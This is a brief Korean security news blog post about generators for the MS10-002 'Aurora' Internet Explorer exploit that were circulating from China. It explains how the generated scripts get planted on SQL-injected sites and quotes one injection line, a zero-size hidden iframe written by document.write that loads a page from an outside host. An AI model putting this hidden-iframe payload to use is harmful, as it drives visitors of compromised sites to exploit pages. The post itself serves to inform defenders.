본문 바로가기
IT 보안소식

MS10-002 취약점(Aurora) 생성기

by 잡다한 처리 2010. 2. 1.
반응형


(그림1. MS10-002 취약점 생성기)

MicroSoft Internet Explorer 0-Day 취약점을 이용한 생성기가 중국쪽에서 많이 유포되고 있다.
위의 생성기들에 들어있는 주소는 임의로 작성한 내용이며,
사용자가 원하는 주소를 입력하여 생성시키면, 취약점 스크립트에 입력주소가 포함되어 생성된다.
생성 된 스크립트 파일은 차후 iframe 명령어 등을 이용하여, SQL인젝션 공격이 된 홈페이지에 추가적으로 생성 될 수 있다.

Ex) SQL에 사용 될 수 있는 코드
document.write('<iframe width=0 height=0 src=http://kjcc2.tistory.com/test/yeren.htm></iframe>');

(그림2. 생성기를 이용하여 생성 된 취약점 스크립트 파일)

(그림3. 생성기를 이용하여 생성 된 취약점 스크립트 파일 내부화면)

(그림4. 생성 된 스크립트 파일을 복호화 하면, 사용자가 입력 한 주소를 포함하고 있는 화면)


댓글